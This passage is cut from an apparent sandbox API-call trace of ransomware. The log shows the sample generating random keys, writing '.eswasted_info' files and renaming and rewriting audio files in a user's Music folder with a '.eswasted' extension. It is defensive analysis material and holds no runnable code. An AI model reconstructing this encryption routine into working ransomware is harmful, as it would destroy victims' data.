phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0079.248] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0079.248] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.248] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\-GMRqLqTl2xTjUrVz-9.wav") returned 63 [0079.248] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x288) returned 0x4e0c48 [0079.248] lstrcpyW (in: lpString1=0x4e0cc6, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.248] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0079.248] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0079.249] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0079.249] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.249] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\-GMRqLqTl2xTjUrVz-9.wav.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\-gmrqlqtl2xtjurvz-9.wav.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0079.250] WriteFile (in: hFile=0x110, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0079.251] SetEndOfFile (hFile=0x110) returned 1 [0079.251] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.251] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0079.251] lstrcpyW (in: lpString1=0x4e0cc6, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.251] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\-GMRqLqTl2xTjUrVz-9.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\-gmrqlqtl2xtjurvz-9.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\-GMRqLqTl2xTjUrVz-9.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\-gmrqlqtl2xtjurvz-9.wav.eswasted")) returned 1 [0079.252] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\-GMRqLqTl2xTjUrVz-9.wav.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\-gmrqlqtl2xtjurvz-9.wav.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0079.252] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0079.253] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0079.254] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0079.254] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.254] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0079.254] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0079.254] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.263] SetEndOfFile (hFile=0x110) returned 1 [0079.265] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0079.265] CloseHandle (hObject=0x110) returned 1 [0079.266] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e0c48 | out: hHeap=0x4a0000) returned 1 [0079.266] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0079.267] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0079.267] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.267] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\11cxTTZUuPGy.mp3") returned 56 [0079.267] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x27a) returned 0x4e0c48 [0079.267] lstrcpyW (in: lpString1=0x4e0cb8, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.267] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0079.267] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0079.268] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0079.268] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.268] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\11cxTTZUuPGy.mp3.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\11cxttzuupgy.mp3.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0079.269] WriteFile (in: hFile=0x110, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0079.270] SetEndOfFile (hFile=0x110) returned 1 [0079.271] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.271] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0079.271] lstrcpyW (in: lpString1=0x4e0cb8, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.271] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\11cxTTZUuPGy.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\11cxttzuupgy.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\11cxTTZUuPGy.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\11cxttzuupgy.mp3.eswasted")) returned 1 [0079.275] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\11cxTTZUuPGy.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\11cxttzuupgy.mp3.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0079.400] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0079.402] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0079.403] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0079.403] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.403] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0079.404] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0079.404] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.412] SetEndOfFile (hFile=0x110) returned 1 [0079.414] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0079.414] CloseHandle (hObject=0x110) returned 1 [0079.415] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e0c48 | out: hHeap=0x4a0000) returned 1 [0079.416] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0079.416] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0079.416] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.416] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\1Mg_rNjLrEPHYNX.m4a") returned 59 [0079.416] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x280) returned 0x4e0c48 [0079.417] lstrcpyW (in: lpString1=0x4e0cbe, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.417] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0079.417] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0079.417] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0079.417] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.417] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\1Mg_rNjLrEPHYNX.m4a.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\1mg_rnjlrephynx.m4a.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0079.418] WriteFile (in: hFile=0x110, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0079.419] SetEndOfFile (hFile=0x110) returned 1 [0079.419] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.419] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0079.419] lstrcpyW (in: lpString1=0x4e0cbe, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.419] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\1Mg_rNjLrEPHYNX.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\1mg_rnjlrephynx.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\1Mg_rNjLrEPHYNX.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\1mg_rnjlrephynx.m4a.eswasted")) returned 1 [0079.420] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\1Mg_rNjLrEPHYNX.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\1mg_rnjlrephynx.m4a.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0079.420] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0079.421] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0079.422] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0079.422] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.422] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0079.422] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0079.422] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.431] SetEndOfFile (hFile=0x110) returned 1 [0079.433] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0079.433] CloseHandle (hObject=0x110) returned 1 [0079.435] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e0c48 | out: hHeap=0x4a0000) returned 1 [0079.435] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0079.436] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0079.436] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.436] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\82pA.mp3") returned 48 [0079.436] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x26a) returned 0x4e0c48 [0079.436] lstrcpyW (in: lpString1=0x4e0ca8, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.436] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0079.436] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0079.437] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0079.437] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.437] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\82pA.mp3.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\82pa.mp3.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0079.437] WriteFile (in: hFile=0x110, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0079.438] SetEndOfFile (hFile=0x110) returned 1 [0079.438] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.438] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0079.438] lstrcpyW (in: lpString1=0x4e0ca8, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.438] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\82pA.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\82pa.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\82pA.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\82pa.mp3.eswasted")) returned 1 [0079.439] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\82pA.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\82pa.mp3.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0079.439] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0079.442] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0079.442] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0079.442] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.442] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0079.443] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0079.443] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.507] SetEndOfFile (hFile=0x110) returned 1 [0079.510] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0079.510] CloseHandle (hObject=0x110) returned 1 [0079.512] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e0c48 | out: hHeap=0x4a0000) returned 1 [0079.512] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0079.513] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0079.513] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.513] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\9ZnaHBaFuttCNF.m4a") returned 71 [0079.513] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x298) returned 0x4e0c48 [0079.514] lstrcpyW (in: lpString1=0x4e0cd6, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.514] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0079.514] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0079.515] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0079.515] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.515] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\9ZnaHBaFuttCNF.m4a.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b7uoo2nnfirn\\9znahbafuttcnf.m4a.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0079.515] WriteFile (in: hFile=0x110, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0079.517] SetEndOfFile (hFile=0x110) returned 1 [0079.517] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.517] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0079.517] lstrcpyW (in: lpString1=0x4e0cd6, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.517] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\9ZnaHBaFuttCNF.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b7uoo2nnfirn\\9znahbafuttcnf.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\9ZnaHBaFuttCNF.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b7uoo2nnfirn\\9znahbafuttcnf.m4a.eswasted")) returned 1 [0079.518] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\9ZnaHBaFuttCNF.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b7uoo2nnfirn\\9znahbafuttcnf.m4a.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0079.518] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0079.520] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0079.521] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0079.521] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.521] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0079.522] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0079.522] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.532] SetEndOfFile (hFile=0x110) returned 1 [0079.535] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0079.535] CloseHandle (hObject=0x110) returned 1 [0079.540] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e0c48 | out: hHeap=0x4a0000) returned 1 [0079.540] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0079.586] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0079.586] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.586] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\fBsqVS_EweHeI.m4a") returned 70 [0079.586] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x296) returned 0x4e0c48 [0079.586] lstrcpyW (in: lpString1=0x4e0cd4, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0079.586] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0079.586] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0079.587] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0079.587] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0079.588] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\fBsqVS_EweHeI.m4a.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b7uoo2nnfirn\\fbsqvs_ewehei.m4a.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0079.657] WriteFile (in: hFile=0x110, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0079.658] SetEndOfFile (hFile=0x110) returned 1 [0079.658] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.658] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0079.658] lstrcpyW (in: lpString1=0x4e0cd4, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0079.658] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\fBsqVS_EweHeI.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b7uoo2nnfirn\\fbsqvs_ewehei.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\fBsqVS_EweHeI.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b7uoo2nnfirn\\fbsqvs_ewehei.m4a.eswasted")) returned 1 [0079.659] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\B7uOo2nNfIrn\\fBsqVS_EweHeI.m4a.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\b7uoo2nnfirn\\fbsqvs_ewehei.m4a.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0079.659] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0079.660] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, 